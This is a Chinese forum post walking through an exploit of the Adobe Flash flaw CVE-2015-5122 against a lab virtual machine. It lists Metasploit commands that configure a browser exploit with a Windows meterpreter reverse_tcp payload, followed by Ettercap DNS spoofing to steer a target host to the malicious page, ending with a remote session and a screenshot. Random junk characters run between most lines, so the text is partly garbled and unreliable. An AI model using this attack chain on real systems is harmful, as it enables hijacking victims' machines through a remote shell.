cve2015-5122漏洞实例演示虚拟机

admin · 发表于 2018-10-20 20:28:02

, f& X6 {( R K) \8 ?" m 二、cve2015-5122漏洞实例演示虚拟机 4 ~, P4 v3 Q) p3 e3 n

& ?' x. A- Z6 V2 n+ A 关于cve2015-5122这个漏洞，大家可以百度一下，是关于flash的漏洞，是2015年flash漏洞的第二发，今天我们就用这个漏洞来演示，开启kai linux msfconsole命令启动msf如图： 2 J; Y4 v- L3 g1 u5 u! l9 S1 ], @

9 I3 n$ S: i8 K+ _5 e search cve-2015-5122如图： 8 e) v9 I$ H E6 D. ]

9 ^4 H5 Z7 L4 R: I' g 2 |* m, L: j+ i

" F5 |5 m: v2 e6 J 下面我们敲如下命令： 0 l# E; O. a% N3 ]% }0 @

2 I4 w$ a2 B% s7 }; [% C8 V use exploit/multi/browser/adobe_flash_opaque_background_uaf " E% `4 x6 L: B9 Y" v& r

' n9 ^7 ?; R* I1 a. ~8 d, D/ E set PAYLOAD windows/meterpreter/reverse_tcp * i* L. l! C, {- s1 H

! l, _, Q! b0 H3 T! P set LHOST 192.168.0.109 8 P' Y8 K6 K7 A- s$ F

6 |( s9 V$ J% W1 E( u set URIPATH / /*根目录*/ & A1 s T0 Q, A, t, U& q1 I$ E2 l

& g/ ~5 D. f: J set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址 1 o% Z- A( k& J2 n

& {: X% B3 `' ?/ K6 ?; j set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 + e/ v) r; w+ @+ K6 ^% x

( _5 [" ^- x0 {: S 然后show options如图： + i- ]( N, Y) m- N6 i9 w

1 Q1 i( K* A6 z4 s+ _7 ]- @ 6 t7 ~8 [' i, H+ w3 `4 S/ X

. O3 {( B4 _% t9 W 一切都设置好了，执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图：
5 L: S% I5 S' A' Z1 Y5 Y. F 0 H7 t& m- k2 o

, C. U$ F# R V+ k: k \; h/ W9 P 然后ettercap -G命令打开ettercap，我们要攻击的主机ip是192.168.0。115 9 m1 y; r7 a4 N

2 H6 v, P# _( m Ettercap过程第一篇里已经演示，这里不在详细写了。。。执行完ettercap以后我们观察一下msf , X2 e( n' f3 o- N% @: v

( \0 l& t. {& v" m; `& Q2 B& i - r" D4 ^, P1 k. ?; N$ ]" P/ ]

2 M6 W* N2 \* F: U2 J0 n! T* m 成功了，这时候我们断开ettercap，如图： ( L4 k" R7 ~% y7 C$ D

7 x/ v- `2 c+ l; h7 R 7 z( \0 Z: r& ?8 [) S" D6 I3 G

7 [9 g* P( C w" q Screenshot如图： - _& N5 w& `' Q$ I% V; Z

7 l+ F3 ^, W; x. @, y - a1 h/ P a/ R5 g- Q( c9 V

9 f4 j5 [/ @4 L' x! O6 f% C 9 ^6 H; u+ Q: ~; S$ `) |5 B% s7 o

		自动登录	找回密码
密码			立即注册

cve2015-5122漏洞实例演示虚拟机

浏览过的版块